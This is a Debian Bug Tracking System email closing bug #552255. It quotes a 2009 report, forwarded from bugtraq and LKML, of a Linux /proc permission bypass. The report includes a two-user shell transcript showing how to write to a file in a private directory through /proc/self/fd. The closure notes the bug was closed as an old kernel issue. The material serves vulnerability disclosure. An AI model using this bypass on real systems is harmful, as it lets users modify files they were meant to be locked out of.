Your message dated Tue, 4 Jun 2013 19:44:43 +0200 with message-id <20130604174443.GC4567@pisco.westfalen.local> and subject line Closing has caused the Debian Bug report #552255, regarding linux-image-2.6.26-2-686: /proc permission bypass to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 552255: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=552255 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Package: linux-image-2.6.26-2-686 Version: 2.6.26-17 Severity: important Currently discussed on bugtraq Cut-n-pasting the email Hi! This is forward from lkml, so no, I did not invent this hole. Unfortunately, I do not think lkml sees this as a security hole, so... Jamie Lokier said: > > > a) the current permission model under /proc/PID/fd has a security > > > hole (which Jamie is worried about) > > > > I believe its bugtraq time. Being able to reopen file with additional > > permissions looks like a security problem... > > > > Jamie, do you have some test script? And do you want your 15 minutes > > of bugtraq fame? ;-). > The reopen does check the inode permission, but it does not require > you have any reachable path to the file. Someone _might_ use that as > a traditional unix security mechanism, but if so it's probably quite rare. Ok, I got this, with two users. I guess it is real (but obscure) security hole. So, we have this scenario. pavel/root is not doing anything interesting in the background. pavel@toy:/tmp$ uname -a Linux toy.ucw.cz 2.6.32-rc3 #21 Mon Oct 19 07:32:02 CEST 2009 armv5tel GNU/Linux pavel@toy:/tmp mkdir my_priv; cd my_priv pavel@toy:/tmp/my_priv$ echo this file should never be writable > unwritable_file # lock down directory pavel@toy:/tmp/my_priv$ chmod 700 . # relax file permissions, directory is private, so this is safe # check link count on unwritable_file. We would not want someone # to have a hard link to work around our permissions, would we? pavel@toy:/tmp/my_priv$ chmod 666 unwritable_file pavel@toy:/tmp/my_priv$ cat unwritable_file this file should never be writable pavel@toy:/tmp/my_priv$ cat unwritable_file got you # Security problem here [Please pause here for a while before reading how guest did it.] Unexpected? Well, yes, to me anyway. Linux specific? Yes, I think so. So what did happen? User guest was able to work around directory permissions in the background, using /proc filesystem. guest@toy:~$ bash 3< /tmp/my_priv/unwritable_file # Running inside nested shell guest@toy:~$ read A <&3 guest@toy:~$ echo $A this file should never be writable guest@toy:~$ cd /tmp/my_priv guest@toy:/tmp/my_priv$ ls unwritable_file # pavel did chmod 000, chmod 666 here guest@toy:/tmp/my_priv$ ls ls: cannot open directory .: Permission denied # Linux correctly prevents guest from writing to that file guest@toy:/tmp/my_priv$ cat unwritable_file cat: unwritable_file: Permission denied guest@toy:/tmp/my_priv$ echo got you >&3 bash: echo: write error: Bad file descriptor # ...until we take a way around it with /proc filesystem. Oops. guest@toy:/tmp/my_priv$ echo got you > /proc/self/fd/3 -- Package-specific info: -- System Information: Debian Release: 5.0.2 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26 (SMP w/1 CPU core; PREEMPT) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages linux-image-2.6.26-2-686 depends on: ii debconf [debconf-2.0] 1.5.24 Debian configuration management sy ii initramfs-tools [linux-initra 0.92o tools for generating an initramfs ii module-init-tools 3.4-1 tools for managing Linux kernel mo Versions of packages linux-image-2.6.26-2-686 recommends: ii libc6-i686 2.7-18 GNU C Library: Shared libraries [i Versions of packages linux-image-2.6.26-2-686 suggests: ii grub 0.97-47lenny2 GRand Unified Bootloader (Legacy v ii lilo 1:22.8-7 LInux LOader - The Classic OS load pn linux-doc-2.6.26 <none> (no description available) -- debconf-show failed
--- End Message ---
--- Begin Message ---Hi, your bug has been filed against the "linux-2.6" source package and was filed for a kernel older than the recently released Debian 7.0 / Wheezy with a severity less than important. We don't have the ressources to reproduce the complete backlog of all older kernel bugs, so we're closing this bug for now. If you can reproduce the bug with Debian Wheezy or a more recent kernel from testing or unstable, please reopen the bug by sending a mail to cont...@bugs.debian.org with the following three commands included in the mail: reopen BUGNUMBER reassign BUGNUMBER src:linux thanks Cheers, Moritz
--- End Message ---
